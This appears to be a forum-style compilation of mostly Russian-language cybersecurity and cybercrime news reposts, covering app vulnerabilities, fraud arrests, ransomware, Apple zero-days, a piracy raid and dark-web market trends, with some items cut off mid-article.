Кроме того, обнаружилось, что приложение уязвимо перед атаками типа Man-in- the-Disk, впервые описанными экспертами Check Point в 2018 году. Эта проблема заключается в том, что многие приложения могут использовать внешнее хранилище (External Storage), деля место с другими приложениями. В итоге данные могут быть удалены, отредактированы или подменены злоумышленниками.
К сожалению, все эти проблемы SHAREit до сих пор не исправлены, так как специалисты Trend Micro не смогли связать с разработчиками приложения. После трех месяцев ожидания эксперты все же решили обнародовать результаты своих исследований и предупредить общественность, ведь «атаки могут затронуть многих пользователей, а злоумышленники могут похитить конфиденциальные данные».
В отчете подчеркивается, что проблемы не представляют угрозы для iOS-версии SHAREit, так как эта версия приложения строится и работает на другой кодовой базе.
Источник: xakep.ru/2021/02/16/shareit-bugs/
Сотрудники Управления по организации борьбы с противоправным использованием информационно-коммуникационных технологий ГУ МВД России по г. Санкт-Петербургу и Ленинградской области задержали пятерых участников группы, которые на протяжении года работали на телефонных мошенников. По имеющимся данным, под контролем украинских кураторов сообщники осуществляли техническое обеспечение работы кол-центров.
Среди задержанных – предполагаемый организатор группы техподдержки и четверо его знакомых в возрасте от 19 до 25 лет.
«Примерно год назад молодой человек в поисках заработка в закрытых чатах теневого сегмента Интернета познакомился с кураторами из-за рубежа. Они осуществляли подбор граждан, которые имели необходимые технические знания и навыки, чтобы обеспечивать бесперебойное функционирование оборудования по подмене номеров во время звонков гражданам России из украинских кол-центров. Еще одной задачей от иностранного работодателя являлось обналичивание денежных средств, которые поступали со счетов потерпевших на дроп-карты, а также их перевод кураторам, в том числе с использованием криптовалютных бирж.
Для размещения специального оборудования молодой человек арендовал офисное помещение в бизнес-центре. Роли соучастников были четко распределены. Одни отвечали за техническую составляющую процесса, другие вели администрирование банковских счетов дропов, которые использовались для приема и дальнейшего транзита похищенных денежных средств. Так, к примеру, самая юная участница группы, 19-летняя жительница города на Неве, занималась урегулированием вопросов с банками, куда она звонила под видом клиента в случае блокировки счета. За каждый такой звонок она получала от 500 до 1000 рублей», – рассказала официальный представитель МВД России Ирина Волк.
С целью конспирации предполагаемый организатор противоправной деятельности регулярно менял адреса офисов, а также ежедневно производил замену сим-карт в слотах сим-банков.
На данный момент установлены четыре эпизода противоправной деятельности на территории г. Санкт-Петербурга и свыше ста – в различных регионах России.
«Возбуждены уголовные дела по признакам преступления, предусмотренного статьей 159 УК РФ.
В настоящее время двое фигурантов заключены под стражу. В отношении троих избрана мера пресечения в виде запрета определенных действий. Предварительное расследование продолжается», – сообщила Ирина Волк.
• Video: https://rutube.ru/video/d66c3b63141997a9e67fabb934fd2441/?r=plemwd
Журналист Джеймс О 'Киф опубликовал записи скрытой камеры, на которых запечатлены тревожные разговоры журналиста под прикрытием с подрядчиком Центрального разведывательного управления. Ничего не подозревающий интервьюируемый, Амджад Фсейси, утверждал, что во время правления бывшего президента Дональда Трампа руководство ЦРУ «скрывало от него информацию, потому что мы знали, что он, бь, ее раскроет», тем самым оставляя лидера государсвта в неведении.*
Представитель ЦРУ подтвердил О'Кифу, что Фсейси, указанный на его теперь уже
затертой странице в LinkedIn как менеджер компании Deloitte из Вирджинии,
ранее работал на агентство, но назвал его утверждения «смехотворными».
Изначально О'Киф указал, что подрядчик ЦРУ работал менеджером проектов по кибероперациям, но затем журналист-расследователь опубликовал исправление, отметив, что Фсейси, как он представился в видео, был менеджером программ в агентстве с его Центром китайской миссии.
«Я работаю на ЦРУ», - говорит Фсейси на камеру неназванному гражданскому журналисту, указывая, что делает это с 2008 года. «Я занимаюсь кибероперациями. Я занимаюсь этим уже долгое время».
В какой-то момент он хвастается, что прошел «полную проверку» и получил TS SCI.(Уровень допуска Совершенно секретно/Конфиденциальная разделенная информация)
«Я помогаю миссионерскому центру, - продолжает подрядчик. «По всему предприятию». (Миссионерские центры ЦРУ объединяют полный спектр операционных, аналитических, вспомогательных, технических и цифровых возможностей. Офицеры каждого управления работают вместе).
Фсейси объяснил, что в настоящее время он работает в Deloitte, «но базируется в ЦРУ», а ранее работал в Lockheed Martin, Northrop Grumman и в Управлении директора национальной разведки.
Показав журналисту, работающему под прикрытием, свой зеленый значок с фотографией, сделанной, по его словам, в 2013 году, Фсейси говорит: «Ладно, я начинаю немного нервничать».
Челси Робинсон, представитель ЦРУ, заявила медиагруппе О'Кифа, что «человек, выдвигающий эти обвинения, является бывшим подрядчиком, который не представляет ЦРУ».
Журналист воспользовался указанием агентства на то, что Фсейси больше не работает в ЦРУ, отметив, что на видео, снятом на прошлой неделе, Фсейси «размахивает своим зеленым значком разведывательного сообщества».
Скрытие информации
Журналист обращается к Фсейси: «Вы сказали, что Майк Помпео (директор ЦРУ (2017—2018)) работал с главами других разведывательных агентств».
Фсейси перебивает: «Совершенно верно».
«Чтобы скрыть информацию от Трампа?», - продолжает журналист.
Фсейси отвечает: «Его предшественница, Джина Хаспел, так и делала».
На вопрос, скрывала ли бывший директор ЦРУ Джина Хаспел информацию от Трампа, Фсейси отвечает: «И я думаю, что Майк Помпео тоже так делал».
«Мы скрывали от него информацию, потому что знали, что он, б***ь, ее раскроет», - говорит Фсейси. «Есть люди, которые дают ему обзор на высоком уровне, но никогда не сообщают никаких деталей. Знаете, почему? Потому что он сливает эти детали».
Это не первый случай, когда человек, обладающий инсайдерской информацией о ЦРУ, говорит о том, что агентство хранит секреты от лидера страны.
Дуглас Лондон, занимавший пост высокопоставленного сотрудника ЦРУ по борьбе с терроризмом во время правления Трампа, в 2022 году сказал газете New York Times: «Мы, конечно, учитывали „какой ущерб он может нанести, если проболтается об этом?“».
По мнению The Times, в одном из случаев в начале своего президентства Трамп проинформировал российских чиновников о террористическом заговоре «Исламского государства», о котором Вашингтон узнал от Израиля. Такая прозрачность сильно возмутила разведывательное сообщество.
Бывший директор ЦРУ Джон Бреннан в марте заявил, что после выдвижения Трампа на пост президента от республиканцев ЦРУ и другие разведывательные службы, скорее всего, снова будут держать его в неведении.
Фсейси не только предположил, что высокопоставленные сотрудники ЦРУ держат президента в неведении, но и ведут за ним постоянное наблюдение.
«У нас есть человеческая разведка, а также люди, которые следят за бывшей женой [Трампа]», - сказал Фсейси. «Он любит использовать одноразовые телефоны».
На вопрос, продолжает ли разведывательное сообщество шпионить за Трампом, Фсейси ответил: «Мы следим за всем. ... Ничто не проходит без чьего-либо наблюдения».
В дополнение к утверждениям о том, что спецслужбы не доверяют Трампу из-за
опасений, что он может использовать больше полномочий, предоставленных ему
американским народом, Фсейси предположил, что спецслужбы не доверяют друг
другу.
На вопрос о том, сотрудничает ли ЦРУ с АНБ, он ответил: «Нет, потому что они
держат дистанцию... Они не любят делиться информацией и это есть большой
проблемой, АНБ раскрыло факт гибели большого количества сотрудников разведки
ЦРУ, поэтому ЦРУ очень неохотно делится информацией с АНБ».
Также он добавил, что не доверяет Израилю, потому что они крадут информацию у
спецслужб США, которой не хотят с ними делиться.
На видео можно увидеть, как Фсейси, столкнувшись с серией своих собственных
цитат, вскидывает руки, а затем заявляет: «Я могу иметь свое мнение, но я не
знаю».
Позже О'Киф отметил, что внезапная осторожность Фсейси могла быть результатом осознания того, что «он может быть привлечен к ответственности за нарушение внутренних положений агентства и федеральных законов, таких как этические положения Исполнительного агентства, которые ограничивают то, чем он может делиться с другими людьми за пределами своего агентства, с которым заключен контракт».
_source:
__https://twitter.com/x/status/1785782393414029738

James O'Keefe released hidden camera footage Wednesday of an undercover journalist's troubling conversations with a Central Intelligence Agency contractor. The unsuspecting interviewee, Amjad Fseisi, claimed that while former President Donald Trump was in office, the CIA leadership "kept...
www.theblaze.com
_
С апреля прошлого года число пользователей браузера Tor в России сократилось более чем двукратно — со 100 тыс. до 48 тыс. человек.
Эксперты связывают это обстоятельство с переездом активной аудитории даркнета за рубеж, переходом хакерских форумов в Telegram и блокировками Роскомнадзора. По их мнению, число пользователей даркнета продолжит сокращаться.
В РКН сообщили, что не отслеживают подключение российских пользователей к ресурсам в интернете. Для предотвращения доступа к незаконной информации регулятор блокирует Tor в рамках противодействия обходам блокировок.
Директор по инновационным проектам ГК InfoWatch Андрей Арефьев объясняет уменьшение аудитории Tor в РФ переездом активных пользователей за границу. Он также указывает на усиление деятельности силовых органов, что позволило вытеснить из страны часть теневых групп.
Кроме того, Арефьев говорит, что прекращение работы части криптобирж в России привело к снижению возможности монетизировать деятельность в даркнете.
Руководитель сервиса мониторинга внешних цифровых угроз Solar AURA ГК «Солар» Александр Вураско рассказал о размытии понятия даркнет в последние годы: «Впоследствии дарквеб стал ассоциироваться с Tor, так как другие технологии “теневого интернета” были ещё менее удобными в использовании и значительно менее распиаренными, оставшись уделом сетевых параноиков».
Эксперт заявил, что по мере роста популярности Telegram традиционный даркнет начала терять позиции. В мессенджер перетекла значительная доля активности Tor-сетей. Также на это повлияла ликвидация ряда популярных площадок, включая Silk Road, ****, Hydra и другие. Это показало несовершенство анонимности даркнета, уверен Вураско.
В перспективе Tor в РФ будут использовать только IT-энтузиасты, отметил руководитель департамента информационно-аналитических исследований компании T.Hunter Игорь Бедеров.
Сегодня Госдума одобрила во втором чтении поправки к ФЗ «Об информации, информационных технологиях и о защите информации» и ФЗ «О связи». В итоге с 1 декабря 2023 года в Рунете могут запретить регистрироваться на сайтах с использованием иностранной электронной почты.
Исходно законопроект был внесен в Госдуму еще в 2018 году, и тогда его приняли первом чтении, но с тех пор документ оставался без движения. 20 июля текущего года депутат Госдумы от «Единой России» Антон Горелкин подготовил поправки ко второму чтению, которое состоялось сегодня, 25 июля 2023 года.
Изначально документ вводил требования к владельцам новостных агрегаторов, которые должны иметь более 50% российского контроля в структуре управления. В обновленной версии законопроекта к этому добавились требования к порядку регистрации на российских сайтах.
Из текста законопроекта следует, что регистрация на российских сайтах с использованием иностранных электронных почтовых сервисов может попасть под запрет. Как [объяснил](https://www.forbes.ru/tekhnologii/493379-gosduma-mozet- zapretit-registraciu-na-rossijskih-sajtah-s-zarubeznymi-imejlami) глава комитета Госдумы по информполитике Александр Хинштейн, поправки касаются порядка регистрации интернет-пользователей на сайтах в случае, если там есть опция регистрации. Ими предусматривается четыре легальных способов регистрации:
В своем Telegram-канале Антон Горелкин связывает инициативу с «обеспечением гарантии сохранности персональных данных» на более высоком уровне.
Как уточнил Александр Хинштейн, под «иной информсистемой» имеются в виду российские сервисы, например «ВКонтакте» или почта Mail.ru. Он добавил, что зарегистрироваться с помощью электронных почтовых адресов иностранных сервисов будет нельзя.
По словам депутата, эта инициатива уже обсуждалась с бизнесом. Горелкин уточнил, что поправки направлены на ограничение «использования для авторизации российских пользователей на информационных ресурсах, владельцами которых являются российские граждане и организации, иностранных систем, обеспечивающих такую авторизацию». Депутат добавил, что «по электронной почте авторизацию проводить можно, но это должна быть российская почта».
В текущей версии документа санкции для владельцев интернет-ресурсов, которые не обеспечат возможность регистрации перечисленными выше способами, не предусмотрены. «Меры ответственности действительно не прописаны, это случится позже, после оценки правоприменительной практики», — говорит Горелкин.
В тексте законопроекта не утоняется, затронут ли ограничения по способам регистрации только сайты из реестра новостных агрегаторов («ВКонтакте», агрегаторы новостей «Рамблер» и «Дзен») или также будут касаться сайтов из реестра организаторов распространения информации (ОРИ, включает соцсети и мессенджеры).
Александр Хинштейн пояснил СМИ, что закон не имеет обратной силы.
«Те, кто зарегистрировался ранее, сохраняют свой доступ. Эта норма касается только тех интернет-ресурсов, где есть регистрация пользователей. Для доступа, например, на “Яндекс”, регистрации не требуется», — сказал Хинштейн, отметив, что это касается и «Госуслуг».
Click to expand...
(с) Мария Нефёдова
При процессуальном руководстве прокуроров Ковельской окружной прокуратуры 20-летнему жителю Николаевской области сообщено о подозрении в совершении мошенничеств путем незаконных операций с использованием электронно- вычислительной техники (ч.3 ст. 190 УК Украины)
По данным следствия, молодой человек занимался фишингом - разновидностью мошенничества, направленным на получение от граждан сведений о реквизитах их банковских карт для похищения с них денег.
В течение октября 2021 - июня 2022 года на платформе онлайн-объявлений «OLX» он подыскивал объявления о продаже вещей, после чего, под видом покупателя, писал продавцам с разных номеров в мессенджерах, соглашался приобрести товар и предлагал оформить услугу «OLX» -доставка - и предоставлял фишинговую ссылку.
Перейдя за ним, пострадавшие оказывалась на сайте, похожем на настоящий сайта оформления услуги «OLX» -доставка, где они вводили данные своей банковской карты (номер, код cvv и срок действия) - и после этого мошенник уже имел полный доступ к их карточному счету.
Таким образом молодой человек обманул 14 граждан на сумму более 230 тысяч гривен.
Досудебное расследование: Ковельское РУП ГУНП в Волынской области.
Apple on Wednesday released a [slew of updates](https://support.apple.com/en- us/HT201222) for iOS, iPadOS, macOS, watchOS, and Safari browser to address a set of flaws it said were actively exploited in the wild.
This includes a pair of zero-days that have been weaponized in a mobile surveillance campaign called [Operation Triangulation](https://thehackernews.com/2023/06/new-zero-click-hack-targets- ios-users.html) that has been active since 2019. The exact threat actor behind the campaign is not known.
The iPhone maker said it's aware that the two issues "may have been actively exploited against versions of iOS released before iOS 15.7," crediting Kaspersky researchers Georgy Kucherin, Leonid Bezvershenko, and Boris Larin for reporting them.
The advisory comes as the Russian cybersecurity vendor dissected the spyware implant used in the zero-click attack campaign targeting iOS devices via iMessages carrying an attachment embedded with an exploit for a remote code execution (RCE) vulnerability.
The exploit code is also engineered to download additional components to obtain root privileges on the target device, after which the backdoor is deployed in memory and the initial iMessage is deleted to conceal the infection trail.
The sophisticated implant, called [TriangleDB](https://thehackernews.com/2023/06/new-report-exposes- operation.html) , operates solely in the memory, leaving no traces of the activity following a device reboot. It also comes with a diverse data collection and tracking capabilities.
This includes "interacting with the device's file system (including file creation, modification, exfiltration, and removal), managing processes (listing and termination), extracting keychain items to gather victim credentials, and monitoring the victim's geolocation, among others."
Also patched by Apple is a third zero-day CVE-2023-32439 , which has been reported anonymously and could result in arbitrary code execution when processing malicious web content.
The actively exploited flaw, described as a type of confusion issue, has been addressed with improved checks. The updates are available for the following platforms -
With the latest round of fixes, Apple has resolved a total of nine zero-day flaws in its products since the start of the year.
In February, the company plugged a WebKit flaw ( [CVE-2023-23529](https://thehackernews.com/2023/02/patch-now-apples-ios- ipados-macos-and.html) ) that could lead to remote code execution. In April, it released updates to resolve two bugs ( [CVE-2023-28205 and CVE-2023-28206](https://thehackernews.com/2023/04/apple-releases-updates-to- address-zero.html) ) that allowed for code execution with elevated privileges.
Subsequently, in May, it shipped patches for three more vulnerabilities in WebKit ( [CVE-2023-32409, CVE-2023-28204, and CVE-2023-32373](https://thehackernews.com/2023/05/webkit-under-attack-apple- issues.html) ) that could permit a threat actor to escape sandbox protection, access sensitive data, and execute arbitrary code.
Компания Илона Маска через два дня запустит на МКС первый в мире хакерский испытательный стенд Moonlighter вместе с пятью другими небольшими спутниками CubeSats на SpaceX CRS-28.
После развертывания Moonlighter станет первой и единственной в мире хакерской песочницей в космосе, которая позволит проводить кибер-эксперименты и тесты на орбитальном спутнике в режиме реального времени.
Наноспутник среднего размера 3U Moonlighter был разработан Национальной лабораторией МКС, Командованием космических систем США и Исследовательской лабораторией ВВС. Проект нацелен на создание более киберустойчивых архитектур для будущих космических миссий.
Также в космос отправятся пять наноспутников, разработанных студентами в рамках канадского проекта CubeSat, который был учрежден для расширения участия студентов в науке и подготовки будущих кадров космической отрасли.
Кроме того, Moonlighter станет частью Hack-A-Sat 4, ежегодного хакерского турнира, организуемого Aerospace, ВВС США и Космических сил США, где финалисты получат возможность взломать CubeSat на орбите.
Организаторы полагают, что в условиях прогрессивно растущей космической экономики и конкуренции в космической среде Moonlighter является важным инструментом для усиления кибербезопасности в космосе.
Запуск SpaceX CRS-28 запланирован не ранее 3 июня в 12:35 по восточному времени.
Налоговая полиция Нидерландов разгромила один из крупнейших в Европе нелегальных онлайн-видеосервисов. В результате рейда на местный дата-центр, насчитывающий более 1 тыс. серверов, пострадали не только пираты, но и веб- сайты нескольких небольших компаний, деливших с ними вычислительные ресурсы ЦОДа.
Разгром европейских пиратов
Служба фискальной информации и расследований Нидерландов (FIOD) уничтожила один из крупнейших в Европе нелегальных видеосервисов, пишет TorrentFreak.
Правоохранительные органы 23 мая 2023 г. провели серию рейдов и обысков в различных частях страны – в Амстердаме, Алмере, Энсхеде, Гааге и Ден-Хелдере – в рамках расследования незаконной деятельности пиратских IPTV-сервисов и интернет-кинотеатров.
Одной из главных целей силовиков стал дата-центр, инфраструктура которого использовалась злоумышленниками. В ходе рейда, проведенного полицией, работа центра обработки данных была остановлена, арестовано четверо подозреваемых, изъяты принадлежащие им активы.
FIOD в разговоре с TorrentFreak подтвердила информацию о том, что все 1,2 тыс. серверов, размещенных в ЦОДе, были обесточены на время разбирательства.
Что известно о сервисе, дата-центре и подозреваемых
Правоохранительные органы не разглашают имена арестованных, бренд, под которым работал пиратский сервис, а также название дата-центра, подвергшегося рейду.
Известно, что сервис за ежемесячную плату в размере 10 евро (сопоставима со стоимостью подписки на Netflix) предоставлял клиентам доступ к 10 тыс. телевизионных каналов, а также 15 тыс. фильмов и сериалов, представленных в популярных интернет-кинотеатрах, таких как Disney+ и Netflix.
Помимо работы с физическими лицами, сервис перепродавал свои услуги более мелким провайдерам цифрового телевидения IPTV и пиратским онлайн-кинотеатрам для дальнейшего распространения контента. Всего, по информации Европола, аудитория сервиса насчитывала свыше 1 млн пользователей по всей Европе.
Однако, по сообщению TorrentFreak, имеющиеся в публичном доступе сведения указывают на то, что нелегальная деятельность осуществлялась на базе ЦОДа GLOBE DataCenter. Косвенно это подтверждается текущей недоступностью официального сайта компании-оператора GLOBE DataCenter BV, управляющей им.
Пострадал легальный бизнес
Как отмечает источник, операции правоохранительных органов по пресечению деятельности пиратских сервисов не являются чем-то необычным для европейского пространства, однако рейды, по результатам которых коммерческий дата-центр целиком прекращает свою работу, пускай и временно, – большая редкость.
Анализ IP-адресов, принадлежащих GLOBE Datacenter и связанных с ними доменных имен, показывает, что многие из них так или иначе могут быть действительно связаны с сервисами IPTV и онлайн-кинотеатрами. TorrentFreak, в частности, упоминает следующие интернет-адреса: nextiptv.org, iptvextrema.com, mercuryiptv.
Помимо потенциальных реселлеров пиратского контента, дата-центр также предоставлял свои вычислительные ресурсы легальным бизнес-структурам, в том числе небольшому хостинг-провайдеру, обслуживавшему несколько десятков клиентов. На его площадке, в частности, были размещены сайты салона педикюра, практикующего дантиста, компаний по прокату спецтехники и аренде курортной недвижимости, магазина семян цветущих растений. Интернет-страницы этих организаций и частных предпринимателей недоступны в Сети с момента начала антипиратской операции.
Предложено считать сопутствующим ущербом
Представитель FIOD в разговоре с TorrentFreak поначалу утверждал, что оперативные мероприятия не должны были отразиться на законопослушных клиентах GLOBE DataCenter, но затем, выслушав журналистов, предложил им оказать содействие полиции, составив список невинно пострадавших.
Предпринимая столь жесткие меры в отношении дата-центра правоохранительные органы исходили из представления о том, что его инфраструктура используется преимущественно пиратским сервисом и лишь незначительный объем потребляемых ресурсов приходится на долю легитимных клиентов, а значит сопутствующий ущерб будет минимальным.
По версии полиции, хостинг-провайдер, обслуживающий затронутые остановкой работы ЦОДа, управлялся одним из сотрудников GLOBE DataCenter, который входит в число подозреваемых по пиратскому делу.
В FIOD утверждают, что серверы, на которых хранятся данные клиентов хостинг- провайдера не изымали и их сохранности ничего не угрожают. Полицейские также утверждают, что власти «делают все возможное», чтоб вернуть доступ клиентам к принадлежащим им данным.
Кибератака на гиганта по производству закусок переросла в нарушение цепочки
поставок по всей Великобритании.
Крупный британский производитель закусок Kenyon Produce (KP) Snacks пострадал
от атаки вымогательской группировки Conti.
KP Snacks включает такие популярные бренды, как PopChips, Skips, Hula Hoops,
Penn State, McCoy's, Wheat Crunchies и т. д. Годовой доход компании
оценивается в более чем $600 млн.
Кибератака на гиганта по производству закусок переросла в нарушение цепочки
поставок по всей Великобритании. Из-за атаки компания была вынуждена задержать
или вовсе отменить поставки в ведущие супермаркеты. Проблемы с поставками
могут продлиться до конца марта.
Как сообщили источники издания Bleeping Computer, внутренняя сеть компании
была взломана, и злоумышленники получили доступ к конфиденциальным файлам,
включая учетные записи сотрудников и финансовые документы.
На странице утечек данных Conti поделилась образцами выписок по кредитным
картам, свидетельств о рождении, электронных таблиц с адресами и номерами
телефонов сотрудников, конфиденциальными соглашениями и другими
конфиденциальными документами.
По словам специалистов платформы DarkFeed, Conti дала компании пять дней на
выплату выкупа, иначе в общем доступе окажется еще больше конфиденциальных
данных.
Остается неизвестным, ведет ли KP Snacks переговоры с Conti и намерена ли
компания заплатить выкуп.
Юный житель Борисова на протяжении нескольких лет использовал специализированное программное обеспечения для взлома учетных записей геймеров. Официальным языком это описано так: «будучи активным игроком, детально изучал аккаунты других пользователей, а затем взламывал их с помощью программ, которые скачивал со специализированных форумов в сети интернет».
Получив доступ, школьник копировал персональные данные, однако дальнейшую их судьбу УВД Минского облисполкома не уточняет. Учетные записи юный белорус раздавал, чтобы повысить популярность своего канала «в одном из приложений», а также поднять его рейтинг и набрать подписчиков.
Причастность борисовчанина к несанкционированному доступу подтвердил осмотр его компьютерной техники, также у школьника изъята флешка с вредоносным программным обеспечением, которое он использовал.
В действиях подростка формально усматриваются признаки состава преступления, предусмотренного ч. 1 ст. 354 Уголовного кодекса Республики Беларусь (использование вредоносных компьютерных программ), однако он не достиг возраста, с которого наступает уголовная ответственность.
The Japanese government will reportedly introduce new regulations across 44 sectors to bolster national cyber defence, partly in response to the [Colonial Pipeline hack](https://www.zdnet.com/article/colonial-pipeline-ransomware- attack-everything-you-need-to-know/) that occurred last week.
The government plans to amend various laws governing each sector through passing an all-encompassing motion and a new law requiring each sector to be conscious of national security risks, Nikkei said in a [report](https://asia.nikkei.com/Business/Technology/Japan-to-restrict-use-of- foreign-tech-in-telecom-power-grids).
The sectors that are expected to see the legislative changes include telecommunications, electricity, finance, railroads, government services, and healthcare, among others. Specifically, these sectors will reportedly be required to look into issues stemming from the use of foreign equipment or services, including cloud data storage and connections to servers located overseas.
The government will also reportedly monitor companies for compliance and gain the power to prevent companies from using foreign equipment if they detect any major issues.
Detailed standards will likely be outlined in future government ordinances and guidelines as well.
Three years ago, Japanese government agencies agreed to [stop procuring equipment](https://www.cnet.com/news/japan-reportedly-will-stop-buying-huawei- zte-equipment/) that could pose national security risks, such as those from Huawei and ZTE. With the latest mandate, the Japanese government now wants to extend that level of stringency to the private sector.
The move comes a week after Colonial Pipeline -- one of America's largest pipeline operators that provides roughly 45% of the country's east coast fuel -- suffered a ransomware attack. Due to the cyber attack, the company had to temporarily close down its operations, freeze IT systems to isolate the infection, and [pay close to $5 million](https://www.zdnet.com/article/colonial-pipeline-paid-close- to-5-million-in-ransomware-blackmail-payment/) to decrypt locked systems.
During the same week of the Colonial Pipeline hack, the culprits of the ransomware attack also [hit Toshiba](https://www.zdnet.com/article/toshiba- unit-struck-by-darkside-ransomware-group/), although the impact of the ransomware attack was primarily in Europe rather than domestically.
Other countries, like the US, have already imposed similar restrictions on tech-related procurement. In the US, companies -- both domestic and foreign -- are [required to gain licensing approval](https://www.zdnet.com/article/us- amends-ban-to-allow-companies-to-work-with-huawei-for- developing-5g-standards/) in order to purchase technology built by Huawei and ZTE or sell goods to those Chinese companies [if they contain certain US technology](https://www.zdnet.com/article/tsmc-likely-to-survive-us-huawei- dispute/).
North of the border, Canadian telcos have also effectively [blocked Huawei out](https://www.zdnet.com/article/canadian-major-telcos-effectively-lock- huawei-out-of-5g-build/) of their 5G network builds by signing deals with the Chinese giant's rivals instead. The Chinese network equipment provider is also [banned in Australia](https://www.zdnet.com/article/australian-government- bans-chinese-vendors-for-5g/) and [Sweden](https://www.zdnet.com/article/sweden-bans-huawei-and-zte-equipment- from-5g-rollout/), and it has not made inroads in New Zealand after [GCSB prevented Spark](https://www.zdnet.com/article/new-zealand-bans-spark-from- using-huawei-for-5g/) from using Huawei kit in November 2018.
Meanwhile, UK mobile networks have been told they [cannot buy any more 5G equipment from Huawei](https://www.zdnet.com/article/huawei-5g-ban-uk- networks-must-strip-out-equipment-by-2027/) after the end of this year, and that they must remove the Chinese networking company's technology from their 5G networks by the end of 2027.
Специалисты ИБ-компании Cado Security обнаружили, что хакеры из группы Molerats (она же Gaza Hackers Team, Gaza Cybergang, DustySky, Extreme Jackal и Moonlight) используют интересную тактику для обмана своих жертв: меняют голос на женский.
Группировка Molerats активна как минимум с 2012 года и в основном атакует организации на Ближнем Востоке. Хак-группа APT-C-23, которая считается частью Molerats, обычно использует социальную инженерию, чтобы заставить своих жертв установить малварь. Так, ранее исследователи уже наблюдали, что хакеры выдают себя женщин и знакомятся в социальных сетях с солдатами Армии обороны Израиля. При этом экспертам точно известно, что все члены группировки – мужчины.
На этот раз участники APT-C-23 пошли еще дальше. Обнаруженная исследователями фишинг-кампания, направленная на политиков, строилась на том, что злоумышленники использовали специальное ПО для изменения голоса, чтобы выдавать себя за женщин, а затем «вовлекали жертв в разговоры». Когда социальная инженерия срабатывала, хакеры обманом заставляли пользователей установить малварь.
В ходе анализа публично доступного сервера, имеющий отношение к группировке,
исследователи Cado Security обнаружили архив, содержащий фотографии из
аккаунта Instagram-модели, а также установщик приложения для изменения голоса
Morph Vox Pro.

На том же сервере специалисты нашли различные инструменты, использованные в атаках: приложение для массовой рассылки фишинговых писем, приложение для взлома VoIP-систем, инструмент поиска уязвимых маршрутизаторов, а также папку, содержащую фишинговую страницу для сбора ученых данных Microsoft.
Источник: xakep.ru/2021/04/07/its-a-trap/
Эксперт Google Project Zero Тэвис Орманди рассказал о серьезной проблеме, которую ему удалось найти в новой версии криптографической библиотеке Libgcrypt 1.9.0, вышедшей 19 января 2021 года. Баг затрагивал GNU Privacy Guard (GnuPG или GPG), systemd и другие приложения, использующие уязвимую версию.
Libgcrypt представляет собой универсальный криптографический модуль, разработанный для GNU Privacy Guard, свободной имплементации стандарта OpenPGP (RFC4880). Код Libgcrypt присутствует во многих дистрибутивах Linux, включая Fedora и Gentoo, и используется в диспетчере пакетов macOS Homebrew, а также в составе systemd для DNSSEC.
Орманди пишет, что найденная ошибка была связана с переполнением буфера хипа, но она считается довольно серьезной, так как ее легко использовать. Злоумышленнику просто нужно отправить библиотеке блок специально подготовленных данных для дешифрования, таким образом вынудив приложение запустить произвольный фрагмент встроенного в него шелкода или вызвав сбой в его работе.
«Простое дешифрование некоторых данных может привести к переполнению буфера хипа данными, контролируемыми злоумышленником, и до срабатывания уязвимости не производятся никакие верификаиции и проверки подписи», — объясняет Вернер Кох, главный разработчик GnuPGP. — Эксплуатировать эту ошибку просто, поэтому пользователям версии 1.9.0 немедленно нужно действовать».
Click to expand...
Пользователям Libgcrypt 1.9.0 рекомендуют как можно скорее обновиться до версии 1.9.1 или вернуться к более старой версии (1.8.5 или выше).
Источник: xakep.ru/2021/02/02/libgcrypt-bug/
Канадец приговорен к 3 годам лишения свободы за торговлю украденными личными данными в даркнете.
29-летний Слава Дмитриев, гражданин Канады, был осужден за мошенничество с устройствами доступа в связи с владением и продажей более 1700 украденных личных данных в даркнете, сообщает Департамент юстиции. Он приговорен к трем годам тюремного заключения с последующим освобождением под надзором в течение трех лет.
Согласно обвинению, Дмитриев использовал прозвище «GoldenAce» для покупки и продажи украденных личных данных, включая номера социального страхования, на рынке даркнета AlphaBay. С мая 2016 года по июль 2017 года Дмитриев продал на AlphaBay 1764 товара примерно на $100 000.
Дмитриев также сотрудничал с кибер-вымогательской группировкой “the Dark Overlord” (“TDO”).
Дмитриев был арестован 8 сентября 2020 года во время путешествия по Греции. На следующий день греческие власти произвели обыск в его доме и обнаружили компьютер, содержащий электронные письма, в которых обсуждалась покупка и продажа личных данных, а также видео о том, как совершить кражу личных данных. Дмитриев признал себя виновным 30 августа 2021 года по обвинению в мошенничестве и связанной с ним деятельности в отношении устройств доступа.
• Source: justice[.]gov/usao-ndga/pr/canadian-man-sentenced-federal-prison- trafficking-stolen-identities-dark-web
защитного ПО
Мы регулярно отслеживаем подпольные рынки в поисках новых крипторов,
предназначенных для обфускации кода в образцах вредоносного ПО. Главная задача
таких инструментов — скрыть вредоносный код от обнаружения защитными
решениями. По данным наших экспертов, в 2024 году стало заметно больше рекламы
крипторов в даркнете. Разработчики этого ПО активно внедряют новые способы
обхода систем безопасности и добавляют их в перечень возможностей своих
коммерческих решений.
Цены на подобные инструменты остались
прежними: от 100 долл.
США в месяц за обычные крипторы, доступные на форумах даркнета, до 20 000
долл. США за частные премиум-подписки. При этом наблюдается рост популярности
частных премиум-решений, которые постепенно вытесняют публичные предложения.
Вердикт: прогноз сбылся
Как и ожидалось, загрузчики активно распространялись в 2024 году. На теневом рынке были представлены загрузчики с разной функциональностью: от массовых и дешевых до узкоспециализированных, разработанных по индивидуальным требованиям и продаваемых за тысячи долларов.
[](https://media.kasperskycontenthub.com/wp-
content/uploads/sites/58/2024/12/13210910/KSB_dark_web_predictions_01.png)
Примеры постов о продаже коммерческих загрузчиков
Кроме того, злоумышленники все чаще используют несколько языков
программирования. Например, клиентская часть вредоносного ПО может быть
разработана на C++, а серверная административная панель — на Go.
Помимо разнообразия предложений загрузчиков, мы также отметили спрос на
специфические инструменты, которые запускают определенные цепочки заражения.
[](https://media.kasperskycontenthub.com/wp-
content/uploads/sites/58/2024/12/13210951/KSB_dark_web_predictions_02.png)
Пример поста о поиске загрузчика с учетом специфических требований
Вердикт: прогноз сбылся
криптовалютных активов
В 2024 году мы обнаружили на теневых рынках рост активности дрейнеров —
вредоносных инструментов для кражи криптоактивов, таких как токены или NFT. В
течение года появлялись новые дрейнеры, которые активно рекламировались на
даркнет-платформах. Отдельно стоит отметить, что количество уникальных тем с
обсуждениями дрейнеров на подпольных рынках выросло с 55 в 2022 году до 129 в
2024 году. Часто эти посты перенаправляли пользователей в Telegram-каналы.
Количество уникальных тем с обсуждением дрейнеров на форумах даркнета
([скачать](https://media.kasperskycontenthub.com/wp-
content/uploads/sites/43/2024/12/13180237/01-en-ru-es-dark-web-diagrams.png))
По сути, в 2024 году каналы Telegram стали важным центром активности,
